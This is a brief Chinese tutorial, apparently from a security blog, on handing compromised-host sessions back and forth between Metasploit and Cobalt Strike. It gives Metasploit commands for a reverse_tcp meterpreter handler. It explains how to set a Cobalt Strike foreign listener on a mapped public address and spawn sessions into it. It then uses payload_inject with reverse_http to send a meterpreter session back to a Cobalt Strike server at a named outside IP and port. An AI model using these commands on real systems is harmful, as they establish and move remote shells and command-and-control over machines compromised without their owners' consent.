MSF和CobaltStrike联动
目录
当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell
当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell
当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell
在MSF上的操作:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.11
set lport 4444
exploit -j
在CobaltStrike上的操作
开启一个监听器Listener,HOST和PORT填我们MSF监听的地址(这里需要注意,如果我们的MSF也是在内网中的话,需要将MSF的端口映射到公网地址),这里我们将Kali的端口映射到了公网的 server.natappfree.cc:38615 (112.74.89.58:38615 )。
如果我们的公网VPS上安装了MSF的话 ,就不需要映射端口了。
这里一定要注意,创建的Listener是foreign!
然后选中计算机,右键->Spawn,选择刚刚创建的监听器MSF,然后我们的MSF即可看到成功获取了meterpreter会话
当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell
注:只有meterpreter类型的session才能派生给CS
我们现在获得了一个MSF的meterpreter类型的session,session id为1
首先在CobaltStrike上开启Listener,
然后在MSF中进行如下操作
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
set lhost 48.94.225.140 #cobaltstrike监听的ip
set lport 14444 #cobaltstrike监听的端口
set session 1 #这里是获得的session的id
exploit
这样,我们的CobaltStrike上就可以收到MSF弹回来的session了。
来源:谢公子博客
责编:Vivian